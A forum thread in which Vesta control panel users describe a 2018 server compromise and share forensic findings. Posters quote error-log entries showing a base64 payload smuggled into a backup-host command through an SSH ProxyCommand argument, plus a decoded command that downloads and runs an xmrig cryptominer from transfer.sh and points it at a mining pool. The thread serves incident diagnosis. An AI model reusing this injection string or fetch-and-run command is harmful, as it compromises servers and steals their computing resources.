We are happy to announce that Vesta is back under active development as of 25 February 2024. We are working on v1 candidate and expect to engage more with the community over the coming months. We are committed to open source, and we encourage contributors to help us build the future of Vesta.
have been HACKED ! by xaxaxa.eu
-
- Posts: 3
- Joined: Wed Jul 12, 2017 7:13 pm
Re: have been HACKED ! by xaxaxa.eu
cybersa wrote: ↑Mon Jul 02, 2018 10:26 amMy Website was Hacked on Jun 22 around 11:10 PM UTC. My Server get upgraded to latest version automatically.But i think server was infected before that.
I have removed the miner file under /tmp/xmrig. Then i have analyzed the log of server to find the root cause and found following things:
1. No new user(sysroot) has been created as mentioned in the first post's script.
2. No New Cron Jobs has been added.
3. xmrig was ran with this cmd:
4. Found this log in /var/log/vesta/error.logCode: Select all
./xmrig --algo=cryptonight --url=pool.minexmr.com:80 --user=42y1QFBDSVmXZbvZZ95CNpPoMddLS4dRPdmh9WgCR3vE5D1b2XqGSV5KoBHuPFSuAjS7Yr7tp48f9AMVLXugDuUMFmp6ugd --thread=1 --donate-level=1 --background
Decode Version:Code: Select all
2018-06-22 23:13:28 v-add-backup-host 'sftp' 'xx' '"-oProxyCommand=echo Y2QgL3RtcDtwa2lsbCB4bXItc3Rhaztwa2lsbCB4bXJpZztybSAtZiB4bXJpZyB4bXItc3RhayBjcHUudHh0IHBvb2xzLnR4dCBjb25maWcudHh0O3dnZXQgLS1uby1jaGVjay1jZXJ0aWZpY2F0ZSAtcU8geG1yaWcgaHR0cHM6Ly90cmFuc2Zlci5zaC9leXo0ei94bXJpZyYmY2htb2QgK3ggeG1yaWcmJi4veG1yaWcgLS1hbGdvPWNyeXB0b25pZ2h0IC0tdXJsPXBvb2wubWluZXhtci5jb206ODAgLS11c2VyPTQyeTFRRkJEU1ZtWFpidlpaOTVDTnBQb01kZExTNGRSUGRtaDlXZ0NSM3ZFNUQxYjJYcUdTVjVLb0JIdVBGU3VBalM3WXI3dHA0OGY5QU1WTFh1Z0R1VU1GbXA2dWdkIC0tdGhyZWFkPSQoZ3JlcCBwcm9jZXNzb3IgL3Byb2MvY3B1aW5mb3x3YyAtbCkgLS1kb25hdGUtbGV2ZWw9MSAtLWJhY2tncm91bmQgPC9kZXYvbnVsbCAyPiYxID4vZGV2L251bGwK|base64 -d|sh" x' '******' [Error 15]
My OS: Ubuntu 16Code: Select all
cd /tmp;pkill xmr-stak;pkill xmrig;rm -f xmrig xmr-stak cpu.txt pools.txt config.txt;wget --no-check-certificate -qO xmrig https://transfer.sh/eyz4z/xmrig&&chmod +x xmrig&&./xmrig --algo=cryptonight --url=pool.minexmr.com:80 --user=42y1QFBDSVmXZbvZZ95CNpPoMddLS4dRPdmh9WgCR3vE5D1b2XqGSV5KoBHuPFSuAjS7Yr7tp48f9AMVLXugDuUMFmp6ugd --thread=$(grep processor /proc/cpuinfo|wc -l) --donate-level=1 --background </dev/null 2>&1 >/dev/null
FYI
@ScIT
no new user but I also found /var/log/vesta/error.log errors in it with logs it run once after upgrading to 22 version also.
Code: Select all
2018-07-12 22:48:01 v-add-backup-host 'sftp' 'xx' '"-oProxyCommand=echo ZWNobyAnIyEvYmluL3NoJz4uLi8uLi9iaW4vdi11cGRhdGUtc3lzLXZlc3RhO2NkIC90bXA7cGtpbGwgeG1yLXN0YWs7cGtpbGwgeG1yaWc7cm0gLWYgeG1yaWcgeG1yLXN0YWsgY3B1LnR4dCBwb29scy50eHQgY29uZmlnLnR4dDt3Z2V0IC0tbm8tY2hlY2stY2VydGlmaWNhdGUgLXFPIHhtcmlnIGh0dHBzOi8vdHJhbnNmZXIuc2gvY3NsRGIveG1yaWcmJmNobW9kICt4IHhtcmlnJiYuL3htcmlnIC0tYWxnbz1jcnlwdG9uaWdodCAtLXVybD14bXItZXUkKCgoJCQlMikrMSkpLm5hbm9wb29sLm9yZzoxNDQ0NCAtLXVzZXI9NDJ5MVFGQkRTVm1YWmJ2Wlo5NUNOcFBvTWRkTFM0ZFJQZG1oOVdnQ1IzdkU1RDFiMlhxR1NWNUtvQkh1UEZTdUFqUzdZcjd0cDQ4ZjlBTVZMWHVnRHVVTUZtcDZ1Z2QgLS10aHJlYWQ9JChncmVwIHByb2Nlc3NvciAvcHJvYy9jcHVpbmZvfHdjIC1sKSAtLWRvbmF0ZS1sZXZlbD0xIC0tYmFja2dyb3VuZCA8L2Rldi9udWxsIDI+JjEgPi9kZXYvbnVsbAo=|base64 -d|sh" x' '******' [Error 15]
Code: Select all
2018-07-13 07:39:36 v-add-backup-host 'sftp' 'xx' '"-oProxyCommand=echo ZWNobyAnIyEvYmluL3NoJz4uLi8uLi9iaW4vdi11cGRhdGUtc3lzLXZlc3RhO2NkIC90bXA7cGtpbGwgeG1yLXN0YWs7cGtpbGwgeG1yaWc7cm0gLWYgeG1yaWcgeG1yLXN0YWsgY3B1LnR4dCBwb29scy50eHQgY29uZmlnLnR4dDt3Z2V0IC0tbm8tY2hlY2stY2VydGlmaWNhdGUgLXFPIHhtcmlnIGh0dHBzOi8vdHJhbnNmZXIuc2gvYnpTQUgveG1yaWcmJmNobW9kICt4IHhtcmlnJiYuL3htcmlnIC0tYWxnbz1jcnlwdG9uaWdodCAtLXVybD14bXItZXUkKCgoJCQlMikrMSkpLm5hbm9wb29sLm9yZzoxNDQ0NCAtLXVzZXI9NDJ5MVFGQkRTVm1YWmJ2Wlo5NUNOcFBvTWRkTFM0ZFJQZG1oOVdnQ1IzdkU1RDFiMlhxR1NWNUtvQkh1UEZTdUFqUzdZcjd0cDQ4ZjlBTVZMWHVnRHVVTUZtcDZ1Z2QgLS10aHJlYWQ9JChncmVwIHByb2Nlc3NvciAvcHJvYy9jcHVpbmZvfHdjIC1sKSAtLWRvbmF0ZS1sZXZlbD0xIC0tYmFja2dyb3VuZCA8L2Rldi9udWxsIDI+JjEgPi9kZXYvbnVsbAo=|base64 -d|sh" x' '******' [Error 15]
Code: Select all
2018-07-22 17:02:00 v-add-backup-host 'sftp' 'xx' '"-oProxyCommand=echo ZWNobyAnIyEvYmluL3NoJz4uLi8uLi9iaW4vdi11cGRhdGUtc3lzLXZlc3RhO2NkIC90bXA7cGtpbGwgeG1yLXN0YWs7cGtpbGwgeG1yaWc7cm0gLWYgeG1yaWcgeG1yLXN0YWsgY3B1LnR4dCBwb29scy50eHQgY29uZmlnLnR4dDt3Z2V0IC0tbm8tY2hlY2stY2VydGlmaWNhdGUgLXFPIHhtcmlnIGh0dHBzOi8vdHJhbnNmZXIuc2gvRmRPSU4veG1yaWcmJmNobW9kICt4IHhtcmlnJiYuL3htcmlnIC0tYWxnbz1jcnlwdG9uaWdodCAtLXVybD14bXItZXUkKCgoJCQlMikrMSkpLm5hbm9wb29sLm9yZzoxNDQ0NCAtLXVzZXI9NDJ5MVFGQkRTVm1YWmJ2Wlo5NUNOcFBvTWRkTFM0ZFJQZG1oOVdnQ1IzdkU1RDFiMlhxR1NWNUtvQkh1UEZTdUFqUzdZcjd0cDQ4ZjlBTVZMWHVnRHVVTUZtcDZ1Z2QgLS10aHJlYWQ9JChncmVwIHByb2Nlc3NvciAvcHJvYy9jcHVpbmZvfHdjIC1sKSAtLWRvbmF0ZS1sZXZlbD0xIC0tYmFja2dyb3VuZCA8L2Rldi9udWxsIDI+JjEgPi9kZXYvbnVsbAo=|base64 -d|sh" x' '******' [Error 15]